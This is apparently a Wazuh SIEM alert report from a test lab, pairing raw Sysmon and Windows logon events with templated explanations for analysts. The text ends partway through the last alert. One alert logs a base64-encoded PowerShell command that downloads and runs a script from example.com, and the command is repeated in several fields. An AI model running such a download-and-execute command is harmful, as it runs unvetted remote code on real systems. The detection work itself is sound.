rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  77
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534317.1661603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:35.0202773Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284690
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:34.972 ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ProcessId: 7408 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_duu0a5qz.2gs.ps1 CreationUtcTime: 2025-04-24 22:38:34.972 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:34.972
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duu0a5qz.2gs.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:34.972
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:39.337+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:39.337+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  56
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534319.1664368
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:36.4053980Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43871
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:39.348+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:39.348+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534319.1671705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:36.5651451Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43873
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:40.874+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:40.874+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  74
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534320.1679042
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:38.2272668Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284720
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:36.142 ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ProcessId: 14508 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ParentProcessId: 7408 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:36.142
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:40.877+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:40.877+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

